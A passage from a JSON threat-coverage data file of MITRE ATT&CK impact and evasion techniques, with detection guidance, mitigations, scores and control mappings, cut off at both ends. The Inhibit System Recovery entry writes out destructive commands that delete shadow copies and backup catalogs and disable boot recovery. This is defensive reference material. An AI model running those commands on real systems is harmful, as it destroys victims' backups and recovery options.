operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).\n\nIn cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)", + "url": "https://attack.mitre.org/techniques/T1485", + "tactics": [ + "Impact" + ], + "detection": "Use process monitoring to monitor the execution and command-line parameters of binaries that could be involved in data destruction activity, such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the creation of suspicious files as well as high unusual file modification activity. In particular, look for large quantities of file modifications in user directories and under C:\\Windows\\System32\\.\n\nIn cloud environments, the occurrence of anomalous high-volume deletion events, such as the DeleteDBCluster and DeleteGlobalCluster events in AWS, or a high quantity of data deletion events, such as DeleteBucket, within a short period of time may indicate suspicious activity.", + "platforms": [ + "IaaS", + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Cloud Storage: Cloud Storage Deletion", + "Command: Command Execution", + "File: File Deletion", + "File: File Modification", + "Image: Image Deletion", + "Instance: Instance Deletion", + "Process: Process Creation", + "Snapshot: Snapshot Deletion", + "Volume: Volume Deletion" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1053", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.", + "url": "https://attack.mitre.org/mitigations/M1053" + } + ], + "cumulative_score": 0.5883293417950062, + "adjusted_score": 0.5883293417950062, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "11.1,11.2,11.3,11.4,11.5" + ], + "nist_controls": [ + "AC-3", + "AC-6", + "CM-2", + "CP-10", + "CP-2", + "CP-7", + "CP-9", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": true, + "hardware_coverage": false + }, + { + "tid": "T1486", + "name": "Data Encrypted for Impact", + "description": "Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)\n\nTo maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)\n\nIn cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)", + "url": "https://attack.mitre.org/techniques/T1486", + "tactics": [ + "Impact" + ], + "detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.\n\nIn some cases, monitoring for unusual kernel driver installation activity can aid in detection.\n\nIn cloud environments, monitor for events that indicate storage objects have been anomalously replaced by copies.", + "platforms": [ + "IaaS", + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Cloud Storage: Cloud Storage Metadata", + "Cloud Storage: Cloud Storage Modification", + "Command: Command Execution", + "File: File Creation", + "File: File Modification", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1053", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.", + "url": "https://attack.mitre.org/mitigations/M1053" + } + ], + "cumulative_score": 0.5407974084266666, + "adjusted_score": 0.5407974084266666, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "11.1,11.2,11.3,11.4,11.5" + ], + "nist_controls": [ + "AC-3", + "AC-6", + "CM-2", + "CP-10", + "CP-2", + "CP-6", + "CP-7", + "CP-9", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": true, + "hardware_coverage": false + }, + { + "tid": "T1489", + "name": "Service Stop", + "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)", + "url": "https://attack.mitre.org/techniques/T1489", + "tactics": [ + "Impact" + ], + "detection": "Monitor processes and command-line arguments to see if critical processes are terminated or stop running.\n\nMonitor for edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to services that do not correlate with known software, patch cycles, etc. Windows service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. Systemd service unit files are stored within the /etc/systemd/system, /usr/lib/systemd/system/, and /home/.config/systemd/user/ directories, as well as associated symbolic links.\n\nAlterations to the service binary path or the service startup type changed to disabled may be suspicious.\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Modification", + "Process: OS API Execution", + "Process: Process Creation", + "Process: Process Termination", + "Service: Service Metadata", + "Windows Registry: Windows Registry Key Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 0.8277596345561904, + "adjusted_score": 0.8277596345561904, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "3.12,4.1,4.7,5.3,5.4,6.1,6.2,6.8,12.2,12.8" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-4", + "AC-5", + "AC-6", + "CA-7", + "CM-5", + "CM-6", + "CM-7", + "IA-2", + "SC-46", + "SC-7", + "SI-4" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1490", + "name": "Inhibit System Recovery", + "description": "Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet\n* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete\n* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet\n* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no", + "url": "https://attack.mitre.org/techniques/T1490", + "tactics": [ + "Impact" + ], + "detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.\n\nMonitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\PreviousVersions\\DisableLocalPage).", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Deletion", + "Process: Process Creation", + "Service: Service Metadata", + "Windows Registry: Windows Registry Key Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1053", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.", + "url": "https://attack.mitre.org/mitigations/M1053" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ], + "cumulative_score": 0.8700249917142857, + "adjusted_score": 0.8700249917142857, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "4.1,11.1,11.2,11.3,11.4,11.5,18.3,18.5" + ], + "nist_controls": [ + "AC-3", + "AC-6", + "CM-2", + "CM-6", + "CM-7", + "CP-10", + "CP-2", + "CP-7", + "CP-9", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1491", + "name": "Defacement", + "description": "Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. \n", + "url": "https://attack.mitre.org/techniques/T1491", + "tactics": [ + "Impact" + ], + "detection": "Monitor internal and external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.\n\n", + "platforms": [ + "IaaS", + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Application Log: Application Log Content", + "File: File Creation", + "File: File Modification", + "Network Traffic: Network Traffic Content" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1491.001", + "name": "Defacement: Internal Defacement", + "url": "https://attack.mitre.org/techniques/T1491/001", + "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)", + "detection": "Monitor internal and websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.", + "mitigations": [ + { + "mid": "M1053", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.", + "url": "https://attack.mitre.org/mitigations/M1053" + } + ] + }, + { + "tid": "T1491.002", + "name": "Defacement: External Defacement", + "url": "https://attack.mitre.org/techniques/T1491/002", + "description": "An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)", + "detection": "Monitor external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.", + "mitigations": [ + { + "mid": "M1053", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.", + "url": "https://attack.mitre.org/mitigations/M1053" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1053", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.", + "url": "https://attack.mitre.org/mitigations/M1053" + } + ], + "cumulative_score": 0.2825238095238095, + "adjusted_score": 0.2825238095238095, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": true, + "cis_controls": [ + "11.1,11.2,11.3,11.4,11.5" + ], + "nist_controls": [ + "AC-3", + "AC-6", + "CM-2", + "CP-10", + "CP-2", + "CP-7", + "CP-9", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1495", + "name": "Firmware Corruption", + "description": "Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.", + "url": "https://attack.mitre.org/techniques/T1495", + "tactics": [ + "Impact" + ], + "detection": "System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Firmware: Firmware Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ], + "cumulative_score": 0.37366190476190475, + "adjusted_score": 0.37366190476190475, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "4.1,4.7,5.3,5.4,6.8,7.1,7.2,7.3,7.5,18.3,18.5" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CA-8", + "CM-3", + "CM-5", + "CM-6", + "CM-8", + "IA-2", + "IA-7", + "RA-9", + "SA-10", + "SA-11", + "SI-2", + "SI-7" + ], + "process_coverage": false, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": true + }, + { + "tid": "T1496", + "name": "Resource Hijacking", + "description": "Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. \n\nOne common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining. Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining malware kills off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)", + "url": "https://attack.mitre.org/techniques/T1496", + "tactics": [ + "Impact" + ], + "detection": "Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources. Monitor for suspicious use of network resources associated with cryptocurrency mining software. Monitor for common cryptomining software process names and files on local systems that may indicate compromise and resource usage.", + "platforms": [ + "Containers", + "IaaS", + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Creation", + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Flow", + "Process: Process Creation", + "Sensor Health: Host Status" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.13279736746666668, + "adjusted_score": 0.13279736746666668, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": true + }, + { + "tid": "T1497", + "name": "Virtualization/Sandbox Evasion", + "description": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nAdversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)\n\n", + "url": "https://attack.mitre.org/techniques/T1497", + "tactics": [ + "Defense Evasion", + "Discovery" + ], + "detection": "Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Process: OS API Execution", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1497.001", + "name": "Virtualization/Sandbox Evasion: System Checks", + "url": "https://attack.mitre.org/techniques/T1497/001", + "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nSpecific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. \n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. \n \nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)", + "detection": "Virtualization/sandbox related system checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.", + "mitigations": [] + }, + { + "tid": "T1497.002", + "name": "Virtualization/Sandbox Evasion: User Activity Based Checks", + "url": "https://attack.mitre.org/techniques/T1497/002", + "description": "Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nAdversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017) ", + "detection": "User activity-based checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ", + "mitigations": [] + }, + { + "tid": "T1497.003", + "name": "Virtualization/Sandbox Evasion: Time Based Evasion", + "url": "https://attack.mitre.org/techniques/T1497/003", + "description": "Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.\n\nAdversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny.(Citation: Deloitte Environment Awareness)\n\nBenign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as [Ping](https://attack.mitre.org/software/S0097)s, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API hammering, involves making various calls to [Native API](https://attack.mitre.org/techniques/T1106) functions in order to delay execution (while also potentially overloading analysis environments with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)\n\nAdversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)", + "detection": "Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ", + "mitigations": [] + } + ], + "mitigations": [], + "cumulative_score": 0.5302138464095238, + "adjusted_score": 0.5302138464095238, + "has_car": false, + "has_sigma": false, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1498", + "name": "Network Denial of Service", + "description": "Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)\n\nA Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nFor DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).", + "url": "https://attack.mitre.org/techniques/T1498", + "tactics": [ + "Impact" + ], + "detection": "Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an Network DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.", + "platforms": [ + "Azure AD", + "Containers", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "data_sources": [ + "Network Traffic: Network Traffic Flow", + "Sensor Health: Host Status" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1498.001", + "name": "Network Denial of Service: Direct Network Flood", + "url": "https://attack.mitre.org/techniques/T1498/001", + "description": "Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001) are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.\n\nBotnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)", + "detection": "Detection of a network flood can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but 